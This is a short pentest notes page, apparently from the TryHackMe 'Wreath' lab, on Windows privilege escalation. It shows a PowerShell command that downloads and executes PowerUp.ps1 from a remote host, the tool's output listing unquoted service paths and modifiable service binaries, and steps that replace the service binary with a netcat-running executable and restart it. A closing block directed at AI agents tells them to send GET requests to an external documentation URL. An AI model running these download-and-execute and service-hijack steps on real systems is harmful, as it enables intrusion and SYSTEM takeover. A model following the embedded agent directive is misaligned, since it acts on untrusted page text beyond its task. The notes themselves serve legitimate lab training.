# Priv Esc ```powerquery powershell "IEX(New-Object Net.WebClient).downloadString('http://10.50.102.164/PowerUp.ps1');Invoke-Allchecks" Privilege : SeImpersonatePrivilege Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED TokenHandle : 2112 ProcessId : 788 Name : 788 Check : Process Token Privileges ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer; IdentityReference=BUILTIN\Users; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe; IdentityReference=BUILTIN\Users; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiableFile : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} ModifiableFileIdentityReference : BUILTIN\Users StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'SystemExplorerHelpService' CanRestart : True Name : SystemExplorerHelpService Check : Modifiable Service Files ModifiablePath : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps IdentityReference : WREATH-PC\Thomas Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} %PATH% : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps Name : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps Check : %PATH% .dll Hijacks AbuseFunction : Write-HijackDll -DllPath 'C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Check : Modifiable Registry Autorun Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Check : Modifiable Registry Autorun Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe; IdentityReference=BUILTIN\Users; Permissions=System.Object[]} Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Check : Modifiable Registry Autorun ``` Compiled malicious executable to run nc ``` copy C:\Users\Thomas\Documents\System.exe "C:\Program Files (x86)\System Explorer\" ``` ``` sc stop SystemExplorerHelpService sc start SystemExplorerHelpService ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/external-pentest-playbook/wreath-try-hack-me/pivoting/10.200.101.100/priv-esc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.